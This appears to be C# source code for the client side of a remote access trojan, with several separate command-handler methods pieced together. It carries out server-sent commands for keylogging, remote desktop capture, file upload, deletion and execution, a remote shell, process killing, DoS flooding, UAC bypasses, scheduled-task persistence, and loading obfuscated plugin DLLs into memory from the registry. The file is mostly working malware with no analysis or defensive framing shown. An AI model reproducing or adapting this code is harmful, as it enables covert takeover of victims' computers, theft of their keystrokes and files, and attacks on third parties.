HandleRemoteDesktop remoteDesktop = new HandleRemoteDesktop();
remoteDesktop.CaptureAndSend(Convert.ToInt32(unpack_msgpack.ForcePathObject("Quality").AsInteger), Convert.ToInt32(unpack_msgpack.ForcePathObject("Screen").AsInteger));
break;
}
case "processManager":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
new HandleProcessManager().ProcessList();
break;
}
case "Kill":
{
new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
break;
}
}
}
break;
case "fileManager":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "getDrivers":
{
FileManager fileManager = new FileManager();
fileManager.GetDrivers();
break;
}
case "getPath":
{
FileManager fileManager = new FileManager();
fileManager.GetPath(unpack_msgpack.ForcePathObject("Path").AsString);
break;
}
case "uploadFile":
{
string fullPath = unpack_msgpack.ForcePathObject("Name").AsString;
if (File.Exists(fullPath))
{
File.Delete(fullPath);
Thread.Sleep(500);
}
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
break;
}
case "reqUploadFile":
{
FileManager fileManager = new FileManager();
fileManager.ReqUpload(unpack_msgpack.ForcePathObject("ID").AsString);
break;
}
case "deleteFile":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(fullPath);
break;
}
case "execute":
{
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(fullPath);
break;
}
}
}
break;
case "socketDownload":
{
FileManager fileManager = new FileManager();
string file = unpack_msgpack.ForcePathObject("File").AsString;
string dwid = unpack_msgpack.ForcePathObject("DWID").AsString;
fileManager.DownnloadFile(file, dwid);
break;
}
case "botKiller":
{
HandleBotKiller botKiller = new HandleBotKiller();
botKiller.RunBotKiller();
break;
}
case "keyLogger":
{
FileManager fileManager = new FileManager();
string isON = unpack_msgpack.ForcePathObject("isON").AsString;
if (isON == "true")
{
new Thread(() =>
{
HandleLimeLogger.isON = true;
HandleLimeLogger.Run();
}).Start();
}
else
{
HandleLimeLogger.isON = false;
}
break;
}
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (url.StartsWith("http"))
{
Process.Start(url);
}
break;
}
case "dos":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "postStart":
{
HandleDos handleDos = new HandleDos();
cts = new CancellationTokenSource();
handleDos.DosPost(unpack_msgpack);
break;
}
case "postStop":
{
cts.Cancel();
break;
}
}
break;
}
case "shell":
{
HandleShell.StarShell();
break;
}
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
{
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
}
break;
}
case "chat":
{
new HandlerChat().CreateChat();
break;
}
case "chatWriteInput":
{
new HandlerChat().WriteInput(unpack_msgpack);
break;
}
case "chatExit":
{
new HandlerChat().ExitChat();
break;
}
}
}
catch { }
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "uac":
{
new HandleUAC();
Connection.Disconnected();
break;
}
case "uacbypass":
{
new HandleUACbypass();
Connection.Disconnected();
break;
}
case "uacbypass2":
{
new HandleUACbypass2();
Connection.Disconnected();
break;
}
case "uacbypass3":
{
new HandleUACbypass3();
Connection.Disconnected();
break;
}
case "schtaskinstall":
{
//HandleSchtaskInstall.DelStartUp();
HandleSchtask.AddStartUp();
//Connection.Disconnected();
break;
}
case "autoschtaskinstall":
{
if (!HandleSchtask.GetStartUp())
{
HandleSchtask.AddStartUp();
//Connection.Disconnected();
}
break;
}
case "schtaskuninstall":
{
HandleSchtask.DelStartUp();
//Connection.Disconnected();
break;
}
case "normalinstall":
{
//HandleSchtaskInstall.DelStartUp();
HandleNormalStartup.Install();
//Connection.Disconnected();
break;
}
case "normaluninstall":
{
HandleNormalStartup.DelStartUp();
//Connection.Disconnected();
break;
}
case "close":
{
Methods.ClientExit();
Environment.Exit(0);
break;
}
case "restart":
{
Methods.ClientExit();
string batch = Path.GetTempFileName() + ".bat";
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine("@echo off");
sw.WriteLine("timeout 3 > NUL");
sw.WriteLine("START " + "\"" + "\" " + "\"" + Process.GetCurrentProcess().MainModule.FileName + "\"");
sw.WriteLine("CD " + Path.GetTempPath());
sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(0);
break;
}
case "uninstall":
{
new HandleUninstall();
break;
}
case "pcOptions":
{
new HandlePcOptions(unpack_msgpack.ForcePathObject("Option").AsString);
break;
}
case "thumbnails":
{
new HandleThumbnails();
break;
}
case "thumbnailsStop":
{
ctsThumbnails?.Cancel();
break;
}
case "reportWindow":
{
new HandleReportWindow(unpack_msgpack);
break;
}
case "nosystem":
{
Methods.ClientExit();
HandleNoSystem.StartProcessAsCurrentUser(Process.GetCurrentProcess().MainModule.FileName);
Environment.Exit(0);
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "pong": //send interval value to server
{
ClientSocket.ActivatePong = false;
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("pong");
msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Interval);
ClientSocket.Send(msgPack.Encode2Bytes());
ClientSocket.Interval = 0;
break;
}
case "plugin": // run plugin in memory
{
try
{
if (SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString) == null) // check if plugin is installed
{
Packs.Add(unpack_msgpack); //save it for later
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("sendPlugin");
msgPack.ForcePathObject("Hashes").SetAsString(unpack_msgpack.ForcePathObject("Dll").AsString);
ClientSocket.Send(msgPack.Encode2Bytes());
}
else
{
Invoke(unpack_msgpack);
}
}
catch (Exception ex)
{
Error(ex.Message);
}
break;
}
case "savePlugin": // save plugin
{
SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").GetAsBytes());
Debug.WriteLine("plugin saved");
foreach (MsgPack msgPack in Packs.ToList())
{
if (msgPack.ForcePathObject("Dll").AsString == unpack_msgpack.ForcePathObject("Hash").AsString)
{
Invoke(msgPack);
Packs.Remove(msgPack);
}
}
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "plugin": // run plugin in memory
{
Received();
Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))));
Type type = assembly.GetType("Plugin.Plugin");
dynamic instance = Activator.CreateInstance(type);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BDOS, Settings.Install);
break;
}
case "savePlugin": // save plugin as MD5:Base64
{
SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").AsString);
Debug.WriteLine("plguin saved");
break;
}
case "checkPlugin": // server sent all plugins hashes, we check which plugin we miss
{
List <string> plugins = new List <string>();
foreach (string plugin in unpack_msgpack.ForcePathObject("Hash").AsString.Split(','))
{
if (SetRegistry.GetValue(plugin) == null)
{
plugins.Add(plugin);
Debug.WriteLine("plguin not found");
}
}
if (plugins.Count > 0)
{
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("sendPlugin");
msgPack.ForcePathObject("Hashes").SetAsString(string.Join(",", plugins));
ClientSocket.Send(msgPack.Encode2Bytes());
}
break;
}
//case "cleanPlugin": // server want to clean and re save all plugins
// {
// SetRegistry.DeleteSubKey();
// MsgPack msgPack = new MsgPack();
// msgPack.ForcePathObject("Packet").SetAsString("sendPlugin+");
// ClientSocket.Send(msgPack.Encode2Bytes());
// break;
// }
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}